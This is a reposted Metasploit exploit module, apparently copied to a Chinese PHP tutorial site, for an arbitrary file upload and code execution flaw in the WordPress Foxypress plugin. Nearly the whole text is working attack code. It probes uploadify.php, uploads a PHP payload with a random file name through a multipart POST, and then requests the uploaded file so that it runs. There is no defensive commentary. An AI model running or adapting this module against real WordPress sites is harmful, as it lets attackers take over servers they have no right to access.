来源:自学PHP网 时间:2015-04-17 13:02 作者: 阅读:次
[导读] require #39;msf/core#39;class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, ......
require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress plugin Foxypress uploadify.php Arbitrary Code Execution', 'Description' => %q{ This module exploits an arbitrary PHP code execution flaw in the WordPress blogging software plugin known as Foxypress. The vulnerability allows for arbitrary file upload and remote code execution via the uploadify.php script. The Foxypress plug-in versions 0.4.2.1 and below are vulnerable. }, 'Author' => [ 'Sammy FORGIT', # Vulnerability Discovery, PoC 'patrick' # Metasploit module ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ ['EDB', '18991'], ['OSVDB', '82652'], ['BID', '53805'], ], 'Privileged' => false, 'Payload' => { 'Compat' => { 'ConnectionType' => 'find', }, }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => 'Jun 05 2012', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, "The full URI path to WordPress", "/"]), ], self.class) end def check uri = target_uri.path uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET', 'uri' => "#{uri}wp-content/plugins/foxypress/uploadify/uploadify.php" }) if res and res.code == 200 return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end www.2cto.com def exploit uri = target_uri.path uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" post_data = Rex::MIME::Message.new post_data.add_part("<?php #{payload.encoded} ?>", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"") print_status("#{peer} - Sending PHP payload") res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{uri}wp-content/plugins/foxypress/uploadify/uploadify.php", 'ctype' => 'multipart/form-data; boundary=' + post_data.bound, 'data' => post_data.to_s }) if not res or res.code != 200 or res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/ print_error("#{peer} - File wasn't uploaded, aborting!") return end print_good("#{peer} - Our payload is at: #{$1}.php! Calling payload...") res = send_request_cgi({ 'method' => 'GET', 'uri' => "#{uri}wp-content/affiliate_images/#{$1}.php" }) if res and res.code != 200 print_error("#{peer} - Server returned #{res.code.to_s}") end end end |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com